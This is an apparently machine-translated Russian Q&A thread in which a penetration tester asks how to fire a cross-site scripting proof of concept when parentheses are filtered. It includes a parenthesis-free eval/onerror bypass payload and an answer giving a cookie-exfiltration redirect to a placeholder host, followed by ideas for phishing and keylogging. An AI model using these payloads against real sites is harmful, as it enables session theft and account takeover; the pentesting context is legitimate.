Предупреждение Javascript без скобок

Question

Я обнаружил, что уязвимость Cross Site Scripting в клиентском приложении.

Проблема в том, что уязвимый параметр не принимает скобки.Так что что-то вроде alert (document.cookie) будет отклонено из-за круглых скобок.

Я могу получить XSS с помощью оповещения xss, и я попробовал приведенный ниже код, также не удалось перезагрузить сайт долгое время, я думаю, что он отклонен

window.onerror=eval;throw '=1;alert\u0028document.location\u0029'

Я пытался по ссылке Альтернативные скобки в JS, если есть? Но мне не удалось.есть ли альтернативы?

спасибо

Answer 1

Есть ли причина, по которой alert необходим?Я понимаю, что это обычное явление для демонстрации доказательства концепции, но достаточно ли просто перенаправления?

Например:

document.location="https://example.com?cookie="+document.cookie

Это важно дляПентестеры помнят, что XSS на самом деле не о всплывающих окнах предупреждений, а о выполнении произвольного JavaScript.Что бы настоящий злоумышленник сделал с доступом, который дает ваш XSS?

Представьте себе, что вы создаете сайт, идентичный домену, аналогичному домену вашего клиента, и перенаправляете туда пользователя ... за исключением того, что теперь вам не нужны XSS иможет регистрировать нажатия клавиш, просить их загружать файлы, пытаться использовать эксплойты браузера и т. д.